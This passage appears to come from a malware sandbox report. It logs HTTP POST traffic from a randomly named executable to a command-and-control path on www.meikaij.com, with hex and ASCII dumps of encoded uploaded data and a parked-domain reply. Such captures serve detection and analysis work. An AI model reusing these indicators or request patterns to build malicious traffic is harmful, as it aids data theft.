7a 6f 44 46 48 67 53 37 4e 2f 4e 4f 57 32 4c 43 45 55 78 76 6f 67 6c 57 52 7a 6c 76 5a 36 57 30 75 35 6c 39 71 56 45 35 67 73 62 79 68 77 50 54 54 68 6e 68 42 73 2b 77 35 66 2b 35 77 50 65 76 6d 57 59 56 6e 4f 55 56 75 65 4d 6a 4e 4d 69 65 52 79 59 71 74 4a 42 6d 69 68 62 4a 35 71 77 6e 62 58 30 67 33 7a 38 55 49 34 55 6b 52 4b 59 69 51 65 53 4c 67 2f 32 2b 69 66 39 42 70 7a 47 6e 34 4f 63 39 6c 4b 6c 65 2b 35 4f 6d 4d 48 4d 7a 36 68 69 5a 6e 31 77 4c 57 4d 49 44 32 57 46 6d 74 59 45 78 6e 38 75 4a 41 6d 6e 2b 30 70 79 36 79 37 65 65 32 33 39 52 46 48
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:45.626821995 CET1065OUTData Raw: 63 38 46 35 6d 79 6a 61 42 6d 64 6d 47 4c 4c 65 4d 6f 56 35 6b 6e 5a 4d 43 6d 2f 38 43 32 4a 53 73 56 57 73 56 34 37 38 4c 47 73 58 4d 69 55 70 35 48 64 44 41 4c 55 44 37 32 41 69 34 70 54 2b 4f 6a 5a 32 47 44 68 48 59 44 6e 6c 69 7a 34 69 45 66
                                                                                                                                                                                                Data Ascii: c8F5myjaBmdmGLLeMoV5knZMCm/8C2JSsVWsV478LGsXMiUp5HdDALUD72Ai4pT+OjZ2GDhHYDnliz4iEfPUCl4uTpbp/Czu0Wj0eLgBMQH7QzJqRWrzHXTtXbiOCdAwAo2sFhEhl99w1YikgNwTfYy2Eii7iOYOT23HjrLZwsjryCUm5fJ41JPJnaVhpkS7Kp76TaHBKd9RnKtq8/t9lu15AVr9Nnw15mlIfb8gMORCVuu0ncd
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727010012 CET1066OUTData Raw: 37 50 43 2f 78 6e 61 74 74 49 50 77 53 47 78 7a 45 6f 6d 51 54 77 72 67 77 78 4b 71 49 4c 4f 69 49 36 73 56 6e 58 73 48 38 48 65 57 45 77 54 38 79 47 6f 74 4b 5a 70 31 33 6f 4a 58 35 59 4c 68 66 7a 4c 72 67 31 7a 45 4f 2b 57 56 54 48 74 50 34 73
                                                                                                                                                                                                Data Ascii: 7PC/xnattIPwSGxzEomQTwrgwxKqILOiI6sVnXsH8HeWEwT8yGotKZp13oJX5YLhfzLrg1zEO+WVTHtP4sNRGWfImHcQw/V8ooTrJFCiiCfvooEPpXGioeZKZMXBhu7FdQjw7lWb7twybbQTg3rx7KM7mZHEZgZMXrNBSnaTnLtFqdGPKuDd9l4N0+Wk4pNRrsshjQF8AZ3nBWLOXq8KpLIH24NOm64n2c72+q+qFvItyqgGUOC
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727181911 CET1071OUTData Raw: 76 73 7a 35 64 6b 69 48 31 53 71 2f 71 65 44 52 75 6e 77 6a 6a 76 6d 36 7a 6c 67 47 50 2b 39 5a 6f 55 48 32 42 49 7a 48 57 49 72 62 6d 68 5a 68 2b 73 76 32 66 56 63 45 79 75 70 52 78 4e 4c 61 6c 6e 70 62 77 2b 4e 6c 4f 35 66 6c 67 53 75 6e 79 4d
                                                                                                                                                                                                Data Ascii: vsz5dkiH1Sq/qeDRunwjjvm6zlgGP+9ZoUH2BIzHWIrbmhZh+sv2fVcEyupRxNLalnpbw+NlO5flgSunyMWK3VNAloS9ORLSma0q0mzo28fJY6LS6s4Y9df4jdRQ8SyR6fQdf9OmEFF53Jl6Mh3/PNlTiqIRs5L3WLIwr5UtJnuk9+Ne9UE7g+1oNxxD7f1khHjjV240L6T8mjAuA83HFSR+h67feh4HuYBmMYHd6qXjcZxpV9+
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727261066 CET1078OUTData Raw: 46 55 6f 6b 57 42 50 71 43 32 4b 74 4b 42 6b 43 69 62 37 48 6b 44 42 7a 6a 54 33 70 68 77 42 6c 35 56 74 65 75 78 36 6a 53 72 6b 6f 57 69 43 68 34 70 66 65 41 39 35 71 2f 6b 48 47 49 58 30 6d 77 6b 65 57 39 41 30 6a 73 4d 79 33 57 71 7a 2b 43 72
                                                                                                                                                                                                Data Ascii: FUokWBPqC2KtKBkCib7HkDBzjT3phwBl5Vteux6jSrkoWiCh4pfeA95q/kHGIX0mwkeW9A0jsMy3Wqz+CrxESG4oTiAzgN2QYH+lmIhyKRMagMvv4vZ2zI2A4e7HM5S6IDPsalW8pCrXWxqhuw+hd1W3Q6wrV0YgeStGRLNCsnYVPmzwGOw5/UldfeohgUWrQq5Cv+esxnrT2gfU/88e+3hT4cycMYZXtbAWT4U0RavPPT7HnLV
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727478981 CET1079OUTData Raw: 78 49 74 63 37 32 61 41 43 33 53 47 6d 43 73 4f 58 70 58 58 2b 4c 6d 6d 4b 4a 52 46 69 78 37 62 6e 41 6a 58 4e 50 2f 4e 39 71 50 51 4f 37 6d 56 34 6f 57 61 34 43 4b 56 55 41 2f 48 30 71 46 6f 71 6c 6f 70 71 6a 74 2b 4e 68 47 35 41 2f 70 2b 44 6d
                                                                                                                                                                                                Data Ascii: xItc72aAC3SGmCsOXpXX+LmmKJRFix7bnAjXNP/N9qPQO7mV4oWa4CKVUA/H0qFoqlopqjt+NhG5A/p+DmW45vapFtHX+9dLpnv3qFDklynO04frtjDL7cHfq7nuZoZxjf5O6mtLq7pMJIst3ZrqeWcMTkSfgdLMZfHcOHorjVFo2zM3aFWD9YDqHo8h1I/sutA1RkdWMUFOUM7+RIRRLktTvH8gU6WwZ8eGGzShfYImTkDLYVs
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727655888 CET1083OUTData Raw: 7a 47 39 71 49 78 59 6a 68 48 74 6c 49 2f 45 41 74 59 35 6d 45 2b 55 4a 30 48 6d 6b 72 6d 2b 6b 58 52 30 36 4c 61 5a 51 63 4f 34 74 51 69 2f 4a 76 42 57 37 79 34 65 76 54 66 49 73 4f 45 78 50 4c 69 42 73 6e 63 71 35 56 4d 6b 73 43 63 78 35 69 37
                                                                                                                                                                                                Data Ascii: zG9qIxYjhHtlI/EAtY5mE+UJ0Hmkrm+kXR06LaZQcO4tQi/JvBW7y4evTfIsOExPLiBsncq5VMksCcx5i7ZktrVlgnEji0mNKAdQNmawJPadMkYJF9ZMiBOm7lKs4G7s8rUfgD3CMeXUCGpHKGdoP/eso1UfvuJ+pNN7rLNi6jquykhy7BV/fGXpy7E3jWNAebKcKt9AjHpENIJ1Ebyvxgv5Xk+IYhHAIrN4iV/eNwPPujwgmCP
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727818012 CET1084OUTData Raw: 77 6e 4b 61 54 4d 33 58 70 79 49 43 75 79 51 44 34 37 50 76 70 6d 74 42 59 67 50 6a 36 52 62 39 51 4d 4e 77 74 76 4f 46 71 66 51 62 50 32 56 37 4d 6c 65 68 62 43 53 76 78 6a 36 64 2f 37 7a 41 6b 48 6d 5a 4c 58 32 64 78 45 44 4c 7a 48 6d 73 58 6a
                                                                                                                                                                                                Data Ascii: wnKaTM3XpyICuyQD47PvpmtBYgPj6Rb9QMNwtvOFqfQbP2V7MlehbCSvxj6d/7zAkHmZLX2dxEDLzHmsXjLprlMTvAfC8AbRB1k0KJea7tVKZxAIAxsD6fQBhKnumn/RVtCdrgvNQachXz+rLQgKonE+wnXRc0F7di5UOSuzDaOOL4UeA+Nus/TB/ztPPDyBEF8IDOvtqpG0TwuJiZU/atIAli+cUQ7jnzeTkAwZlsnHtB8PvGQ
                                                                                                                                                                                                Nov 17, 2023 19:30:45.727989912 CET1085OUTData Raw: 6e 71 65 42 38 50 45 79 4e 6f 34 4e 6f 66 7a 6b 52 50 4d 45 55 65 6c 63 47 66 39 6d 2b 4f 56 4e 70 45 6f 71 35 38 52 43 45 6b 73 48 6e 63 2b 66 61 68 68 2b 36 33 76 4f 59 54 6c 30 32 77 71 62 42 76 66 44 71 61 44 66 6b 56 74 35 39 77 31 2b 39 30
                                                                                                                                                                                                Data Ascii: nqeB8PEyNo4NofzkRPMEUelcGf9m+OVNpEoq58RCEksHnc+fahh+63vOYTl02wqbBvfDqaDfkVt59w1+90yPa7cq68TwybzeIgHubdF9mmSYOY3pik6GSt1pMmejbGNK9DbZFpsUXVxgnCMVchVvLCCVYpDfNn6vYzlganAUHvv/FgnDvBnFuedWKXQGqGr4nYj6Ow+DF1ZKIVX+vmzeb6/xY0ap0TLPp3Oe+6VkIC2+xWLeJ44
                                                                                                                                                                                                Nov 17, 2023 19:30:45.728159904 CET1088OUTData Raw: 57 6b 6d 6d 5a 46 67 76 75 59 59 38 66 35 47 59 65 61 4d 36 6d 6a 4f 4c 61 2f 79 49 69 6d 41 77 57 65 64 42 57 39 4c 4b 67 2b 61 6e 32 4a 5a 5a 49 57 79 52 6c 39 39 4e 30 57 4c 56 63 59 33 6b 53 76 48 50 72 30 4d 45 4d 4e 53 4f 35 51 62 56 68 38
                                                                                                                                                                                                Data Ascii: WkmmZFgvuYY8f5GYeaM6mjOLa/yIimAwWedBW9LKg+an2JZZIWyRl99N0WLVcY3kSvHPr0MEMNSO5QbVh8IiLWFkWFvMRoNTFeSLEjRJWB6dnUsUrOZzA/jrt7mWS056qThM70C591HfCSEGemWv/HZuV+APyy1+RUCx3cGT10m6vx+EPJnjV9awB4/Ela/Uiz6n7KT9p32D3STO9TBDmveutQO8vW2do8MzNdrEV8FQZov4UCy
                                                                                                                                                                                                Nov 17, 2023 19:30:45.728276014 CET1089OUTData Raw: 6f 49 58 66 46 51 6b 35 4d 53 6e 42 78 69 57 79 66 54 52 47 76 34 56 46 53 46 31 45 50 57 49 36 42 32 61 78 35 48 33 68 32 67 71 6a 78 79 39 53 33 59 65 36 73 4f 36 36 42 56 45 32 70 41 79 50 72 71 48 30 54 76 70 42 43 36 64 4b 4c 33 6c 43 45 35
                                                                                                                                                                                                Data Ascii: oIXfFQk5MSnBxiWyfTRGv4VFSF1EPWI6B2ax5H3h2gqjxy9S3Ye6sO66BVE2pAyPrqH0TvpBC6dKL3lCE5axK0UhEGFuQUJxOvQBZxmZfr/0d7cHSOgncgVxtjiQCpiRHflugaXNk0hxhdG2C9eDLVMm6/aAPzzX2Gg5TN1FG54JsF58Xjm+5VxRr0TNxxSdRp+toDXiQGAk4eVg7njbeFb2vLiVcMQvivsSa5SgZSoXFgtpVG9
                                                                                                                                                                                                Nov 17, 2023 19:30:45.933751106 CET1108INHTTP/1.1 200 OK
                                                                                                                                                                                                date: Fri, 17 Nov 2023 18:30:44 GMT
                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                content-length: 1085
                                                                                                                                                                                                x-request-id: 5196fd6f-e925-49b6-a847-0f76be474b15
                                                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==
                                                                                                                                                                                                set-cookie: parking_session=5196fd6f-e925-49b6-a847-0f76be474b15; expires=Fri, 17 Nov 2023 18:45:45 GMT; path=/
                                                                                                                                                                                                connection: close
                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 6d 6a 51 65 33 65 67 39 75 33 63 62 6a 38 38 74 55 4e 4f 37 67 66 57 30 34 2f 51 46 51 5a 76 6c 73 74 4c 6a 76 59 53 44 6a 37 75 73 55 51 65 45 59 33 66 68 34 64 4f 37 34 4d 45 43 54 66 61 4b 31 62 57 36 45 57 77 2f 63 59 77 75 45 45 58 65 56 71 37 73 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 45 41 41 41 41 42 43 41 49 41 41 41 43 51 64 31 50 65 41 41 41 41 44 45 6c 45 51 56 51 49 31 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b
                                                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_omjQe3eg9u3cbj88tUNO7gfW04/QFQZvlstLjvYSDj7usUQeEY3fh4dO74MECTfaK1bW6EWw/cYwuEEXeVq7sg==" lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTk
                                                                                                                                                                                                Nov 17, 2023 19:30:45.933834076 CET1109INData Raw: 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68
                                                                                                                                                                                                Data Ascii: SuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTE5NmZkNmYtZTkyNS00OWI2LWE4NDctMGY3NmJlNDc0YjE1IiwicGFnZV90aW1lIjoxNzA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                49192.168.11.2050176199.59.243.22580C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:45.626696110 CET1054OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.meikaij.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.meikaij.com
                                                                                                                                                                                                Referer: http://www.meikaij.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 45 74 74 4a 34 2b 7a 56 63 6f 5a 6a 69 72 2f 4e 41 6d 43 42 73 68 66 53 52 6b 70 4e 4c 4e 62 56 7a 6f 45 6a 54 43 39 74 56 64 7a 2b 4e 45 64 68 54 6e 79 73 37 78 6e 6e 32 58 53 32 7a 52 45 35 71 76 33 72 71 4d 51 61 49 63 46 49 6b 50 6d 47 2b 74 64 66 38 38 77 70 72 63 45 68 76 68 42 6f 76 4b 6a 2b 35 52 2f 48 78 30 65 57 64 4f 58 79 39 6d 52 51 59 55 71 64 59 6b 5a 39 68 41 49 2b 4d 35 67 56 74 56 44 68 36 64 66 70 33 75 63 39 50 45 58 52 6c 6e 74 35 63 70 39 4f 69 45 54 6c 48 35 50 71 6b 32 58 71 6d 43 37 72 6b 47 49 54 55 72 4a 6a 7a 4d 63 33 66 57 5a 58 4c 71 61 43 68 33 52 6b 45 64 6a 6e 61 77 61 6e 51 75 74 47 38 78 42 50 31 67 36 6e 4f 62 30 33 66 35 6e 63 47 67 38 7a 69 37 6d 53 4c 58 64 76 58 67 44 4e 47 38 51 46 45 48 74 52 7a 47 69 32 48 43 44 50 6c 36 37 63 73 6a 62 4b 32 34 68 74 45 51 74 4e 58 54 33 63 44 33 56 65 53 62 79 67 34 34 34 6c 76 2f 6f 49 47 4f 41 57 31 70 4f 42 6c 46 52 64 50 48 5a 2f 61 34 34 73 47 71 33 66 33 34 4f 6f 49 37 65 54 73 33 77 41 53 53 6b 72 36 79 65 2f 43 66 53 42 78 6e 59 79 5a 66 54 57 48 59 69 32 34 37 56 33 74 4a 6a 63 50 74 70 69 4f 79 51 72 49 63 36 47 47 4d 58 53 6b 34 6d 48 68 4e 66 54 37 75 7a 32 58 4b 64 4d 34 2b 68 30 71 56 38 72 43 44 76 74 7a 63 4b 52 45 46 71 6b 34 71 4c 69 35 6f 7a 72 35 68 48 4f 54 61 73 2b 33 39 76 51 78 31 39 6f 4f 37 4a 66 30 6d 4d 34 64 2f 7a 4b 76 6e 31 52 2f 69 6f 66 6e 69 61 44 4f 38 64 74 39 7a 6d 32 52 49 47 41 76 70 63 78 66 39 5a 37 77 56 4b 6f 34 70 34 2b 51 30 50 67 37 50 47 48 4a 6f 4a 55 4f 4c 59 31 67 4b 74 2b 6e 35 2b 4b 59 45 67 44 42 49 4a 32 79 30 66 56 55 30 4b 73 4a 2f 42 68 4c 4d 44 7a 34 30 48 68 59 72 57 4c 4c 45 6b 55 4c 39 57 41 48 42 55 4f 58 34 4d 71 37 61 43 41 51 34 75 49 65 72 4c 59 7a 6b 47 6f 49 67 31 38 79 58 6c 56 31 36 4e 35 39 31 50 61 69 41 66 4f 2f 6b 4c 56 7a 53 30 59 38 56 4c 64 50 75 50 58 46 4d 77 37 7a 64 50 75 45 36 65 54 6c 32 57 34 42 54 42 50 46 32 55 4f 51 66 51 6d 78 62 4f 4f 4e 58 59 32 5a 72 49 57 4a 32 4a 38 4b 55 59 6c 61 42 51 69 62 48 35 54 39 67 72 72 6e 64 36 66 78 77 62 42 46 32 4d 6f 31 4a 4c 2f 56 4c 37 6e 33 39 4f 79 39 46 46 46 33 30 6a 6b 45 4e 31 70 58 46 6d 65 61 78 30 4e 59 33 73 69 6a 45 58 30 51 32 69 2b 75 6b 6f 4b 67 4c 6d 34 63 43 7a 76 67 53 7a 49 34 68 62 70 4c 43 72 45 41 2f 68 37 76 6f 31 68 6c 2f 54 4e 44 79 39 2b 41 64 4a 68 77 58 4d 42 37 6c 54 58 5a 48 69 64 41 71 56 4b 4c 4c 48 70 76 32 58 48 65 58 6e 46 75 79 43 35 36 69 42 6d 6a 7a 2f 4f 6c 76 34 55 69 32 2b 58 74 4d 49 49 47 33 61 64 42 75 63 2b 2b 54 51 36 36 53 65 31 5a 6a 68 6d 46 35 38 30 5a 37 4d 6e 5a 4d 32 7a 74 77 56 74 2f 32 32 68 45 35 39 6c 59 32 52 56 69 48 43 64 51 6b 6c 55 61 36 50 45 39 52 62 30 34 34 37 5a 47 70 59 61 38 5a 76 7a 61 68 4c 31 78 59 39 75 41 39 65 55 53 30 53 43 53 35 67 65 72 67 58 50 66 48 73 41 4a 72 4c 4c 47 4d 64 31 75 46 44 4d 73 74 57 70 79 52 6e 79 5a 70 6e 41 6d 5a 48 74 52 56 70 49 61 6b 7a 7a 4b 50 32 34 37 53 68 71 55 4a 73 4c 2b 44 34 5a 58 31 64 47 4a 68 49 36 67 50 70 36 4a 5a 6a 4f 51 63 75 42 34 47 58 2f 69 4b 4b 51 51 35 41 39 34 37 6e 72 70 68 41 2b 6d 33 6b 30 58 4d 6d 4a 32 77 30 72 33 71 30 39 57 56 51 2f 43 63 4b 6b 4e 46 31 72 43 57 6e 44 6a 41 41 61 4f 57 53 39 35 6d 5a 2b 6d 48 5a 46 77 39 4e 74 36 7a 33 51 46 34 33 58 57 56 47 4c 34 4e 61 6e 58 57 37 49 53 52 54 4a 34 34 79 71 63 52 6a 63 6a 5a 6f 75 41 37 49 4b 78 65 6e 35 4e 4f 4a 69 49 36 52 33 7a 6d 4e 54 62 71 32 47 6a 78 75 44 53 78 55 2f 53 59 4a 6c 75 77 33 30 68 42 4a 73 39 44 6c 34 39 59 72 62 45 62 78 42 66 52 48 6e 55 62 53 4e 53 7a 6f 44 46 48 67 53 37 4e 2f 4e 4f 57 32 4c 43 45 55 78 76 6f 67 6c 57 52 7a 6c 76 5a 36 57 30 75 35 6c 39 71 56 45 35 67 73 62 79 68 77 50 54 54 68 6e 68 42 73 2b 77 35 66 2b 35 77 50 65 76 6d 57 59 56 6e 4f 55 56 75 65 4d 6a 4e 4d 69 65 52 79 59 71 74 4a 42 6d 69 68 62 4a 35 71 77 6e 62 58 30 67 33 7a 38 55 49 34 55 6b 52 4b 59 69 51 65 53 4c 67 2f 32 2b 69 66 39 42 70 7a 47 6e 34 4f 63 39 6c 4b 6c 65 2b 35 4f 6d 4d 48 4d 7a 36 68 69 5a 6e 31 77 4c 57 4d 49 44 32 57 46 6d 74 59 45 78 6e 38 75 4a 41 6d 6e 2b 30 70 79 36 79 37 65 65 32 33 39 52 46 48
                                                                                                                                                                                                Data Ascii: T6I=EttJ4+zVcoZjir/NAmCBshfSRkpNLNbVzoEjTC9tVdz+NEdhTnys7xnn2XS2zRE5qv3rqMQaIcFIkPmG+tdf88wprcEhvhBovKj+5R/Hx0eWdOXy9mRQYUqdYkZ9hAI+M5gVtVDh6dfp3uc9PEXRlnt5cp9OiETlH5Pqk2XqmC7rkGITUrJjzMc3fWZXLqaCh3RkEdjnawanQutG8xBP1g6nOb03f5ncGg8zi7mSLXdvXgDNG8QFEHtRzGi2HCDPl67csjbK24htEQtNXT3cD3VeSbyg444lv/oIGOAW1pOBlFRdPHZ/a44sGq3f34OoI7eTs3wASSkr6ye/CfSBxnYyZfTWHYi247V3tJjcPtpiOyQrIc6GGMXSk4mHhNfT7uz2XKdM4+h0qV8rCDvtzcKREFqk4qLi5ozr5hHOTas+39vQx19oO7Jf0mM4d/zKvn1R/iofniaDO8dt9zm2RIGAvpcxf9Z7wVKo4p4+Q0Pg7PGHJoJUOLY1gKt+n5+KYEgDBIJ2y0fVU0KsJ/BhLMDz40HhYrWLLEkUL9WAHBUOX4Mq7aCAQ4uIerLYzkGoIg18yXlV16N591PaiAfO/kLVzS0Y8VLdPuPXFMw7zdPuE6eTl2W4BTBPF2UOQfQmxbOONXY2ZrIWJ2J8KUYlaBQibH5T9grrnd6fxwbBF2Mo1JL/VL7n39Oy9FFF30jkEN1pXFmeax0NY3sijEX0Q2i+ukoKgLm4cCzvgSzI4hbpLCrEA/h7vo1hl/TNDy9+AdJhwXMB7lTXZHidAqVKLLHpv2XHeXnFuyC56iBmjz/Olv4Ui2+XtMIIG3adBuc++TQ66Se1ZjhmF580Z7MnZM2ztwVt/22hE59lY2RViHCdQklUa6PE9Rb0447ZGpYa8ZvzahL1xY9uA9eUS0SCS5gergXPfHsAJrLLGMd1uFDMstWpyRnyZpnAmZHtRVpIakzzKP247ShqUJsL+D4ZX1dGJhI6gPp6JZjOQcuB4GX/iKKQQ5A947nrphA+m3k0XMmJ2w0r3q09WVQ/CcKkNF1rCWnDjAAaOWS95mZ+mHZFw9Nt6z3QF43XWVGL4NanXW7ISRTJ44yqcRjcjZouA7IKxen5NOJiI6R3zmNTbq2GjxuDSxU/SYJluw30hBJs9Dl49YrbEbxBfRHnUbSNSzoDFHgS7N/NOW2LCEUxvoglWRzlvZ6W0u5l9qVE5gsbyhwPTThnhBs+w5f+5wPevmWYVnOUVueMjNMieRyYqtJBmihbJ5qwnbX0g3z8UI4UkRKYiQeSLg/2+if9BpzGn4Oc9lKle+5OmMHMz6hiZn1wLWMID2WFmtYExn8uJAmn+0py6y7ee239RFH9Cwvvkh+g3HpgkeqxjI0GUtMnI9ywHRW1/bsI+0Z8Vm7tt/2psJeYdVMfniCGfA8ayMOQe